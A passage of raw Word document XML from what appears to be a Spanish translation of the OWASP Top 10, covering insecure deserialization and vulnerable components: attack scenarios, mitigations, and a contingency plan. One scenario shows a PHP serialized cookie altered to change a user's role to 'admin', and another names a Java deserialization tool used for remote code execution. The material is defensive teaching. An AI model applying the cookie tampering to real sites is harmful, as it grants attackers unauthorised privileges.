                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Monitoree los procesos de deserialización, alertando si un usuario deserializa constantemente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="006B7D3B" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ejemplos de escenarios de ataque</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="004B44BF">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #1: </w:t>
            </w:r>
            <w:r w:rsidRPr="004B44BF">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">una aplicación React invoca a un conjunto de </w:t>
            </w:r>
            <w:r w:rsidR="004B44BF" w:rsidRPr="004B44BF">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>micro servicios</w:t>
            </w:r>
            <w:r w:rsidRPr="004B44BF">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Spring Boot. Siendo programadores funcionales, intentaron asegurar que su código sea inmutable. La solución a la que llegaron es serializar el estado del </w:t>
            </w:r>
            <w:r w:rsidRPr="004B44BF">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>usuario y pasarlo en ambos sentidos con cada solicitud. Un atacante advierte la firma “R00” del objeto Java, y usa la herramienta Java Serial Killer para obtener ejecución de código remoto en el servidor de la aplicación.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="004B44BF">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Escenario #2: </w:t>
            </w:r>
            <w:r w:rsidRPr="004B44BF">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>un foro PHP utiliza serialización de objetos PHP para almacenar una “super cookie”, conteniendo el ID, rol, hash de la contraseña y otros estados del usuario:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>a:4:{i:0;i:132;i:1;s:7:"</w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Mallory"</w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>;i:2;s:4:"</w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>user</w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>";i:3;s:32:"b6a8b3bea87fe0e05 022f8f3c88bc960";}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="004B44BF" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B44BF">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Un atacante modifica el objeto serializado para darse privilegios de administrador a sí mismo: </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>a:4:{i:0;i:1;i:1;s:5:"</w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Alice</w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>";i:2;s:5:"</w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="70AD47"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>“;i:3;s:32:"b6a8b3bea87fe0e05022 f8f3c88bc960";}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00A258FF" w:rsidRPr="00064150" w:rsidRDefault="00A258FF" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="252F21DA" wp14:editId="1C326EB5">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-64770</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>288</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1295581" cy="838317"/>
                  <wp:effectExtent l="0" t="0" r="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44F91D.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId90">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1295581" cy="838317"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Componentes con vulnerabilidades conocidas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F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0" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00A258FF" w:rsidRDefault="00912EEA" w:rsidP="00A258FF">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A258FF">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Los componentes como bibliotecas, frameworks y otros módulos se ejecutan con los mismos privilegios que la aplicación. Si se explota un componente vulnerable, el ataque puede provocar una pérdida de datos o tomar el control del servidor. Las aplicaciones y API que utilizan componentes con vulnerabilidades conocidas pueden debilitar las defensas de las aplicaciones y permitir diversos ataques e impactos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12180" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRDefault="00AD2341" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:noProof/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251703296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55CDC64E" wp14:editId="523D9326">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-81675</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>-36195</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="8241030" cy="837565"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="63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4475FA.tmp"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId91">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8241030" cy="837565"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                  <wp14:sizeRelH relativeFrom="page">
                    <wp14:pctWidth>0</wp14:pctWidth>
                  </wp14:sizeRelH>
                  <wp14:sizeRelV relativeFrom="page">
                    <wp14:pctHeight>0</wp14:pctHeight>
                  </wp14:sizeRelV>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00AD2341" w:rsidRPr="00912EEA" w:rsidRDefault="00AD2341" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00167841" w:rsidRPr="00912EEA" w:rsidTr="00296F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rsidR="00912EEA" w:rsidRPr="00AD2341" w:rsidRDefault="00912EEA" w:rsidP="00AD2341">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD2341">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Es sencillo obtener exploits para vulnerabilidades ya conocidas pero la explotación de otras requieren un esfuerzo considerable, para su desarrollo y/o personalización.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4961" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00AD2341">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Estos defectos están muy difundidos. El desarrollo basado fuertemente en componentes de terceros, puede llevar a que los desarrolladores no entiendan qué componentes se utilizan en la aplicación o API y, mucho menos, mantenerlos actualizados. Esta debilidad es detectable mediante el uso de analizadores tales como retire.js o la inspección de cabeceras. La verificación de su explotación requiere de la descripción de un posible ataque.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3680" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00AD2341">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Mientras que ciertas vulnerabilidades conocidas conllevan impactos menores, algunas de las mayores brechas registradas han sido realizadas explotando vulnerabilidades conocidas en componentes comunes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidTr="00296F9B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6091" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>¿La aplicación es vulnerable?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="008E1212" w:rsidRDefault="00912EEA" w:rsidP="008E1212">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E1212">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Es potencialmente vulnerable si:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="008E1212" w:rsidRDefault="00912EEA" w:rsidP="008E1212">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E1212">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">No conoce las versiones de todos los componentes que utiliza (tanto del lado del cliente como del servidor). Esto incluye componentes utilizados directamente como sus dependencias anidadas. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="008E1212" w:rsidRDefault="00912EEA" w:rsidP="008E1212">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E1212">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">El software es vulnerable, no posee soporte o se encuentra desactualizado. Esto incluye el sistema operativo, servidor web o de aplicaciones, DBMS, APIs y todos los componentes, ambientes de ejecución y bibliotecas. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="008E1212" w:rsidRDefault="00912EEA" w:rsidP="008E1212">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E1212">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">No se analizan los componentes periódicamente ni se realiza seguimiento de los boletines de seguridad de los componentes utilizados. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="008E1212" w:rsidRDefault="00912EEA" w:rsidP="008E1212">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E1212">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">No se parchea o actualiza la plataforma subyacente, frameworks y dependencias, con un enfoque basado en riesgos. Esto sucede comúnmente en ambientes en los cuales la aplicación de parches se realiza de forma mensual o trimestral bajo control de cambios, lo que deja a la organización abierta innecesariamente a varios días o meses de exposición a vulnerabilidades ya solucionadas. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="008E1212">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E1212">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>No asegura la configuración de los componentes correctamente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6089" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="00BA6B7F">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Plan de contingencia</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="008E1212">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Remover dependencias, funcionalidades, componentes, archivos y documentación innecesaria y no utilizada. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="008E1212">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Utilizar una herramienta para mantener un inventario de versiones de componentes (por ej. frameworks o bibliotecas) tanto del cliente como del servidor.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="008E1212">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00912EEA">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Monitorizar continuamente fuentes como CVE y NVD en búsqueda de vulnerabilidades en los componentes utilizados.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00912EEA" w:rsidRPr="00912EEA" w:rsidRDefault="00912EEA" w:rsidP="008E1212">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:contextualSpacing/>
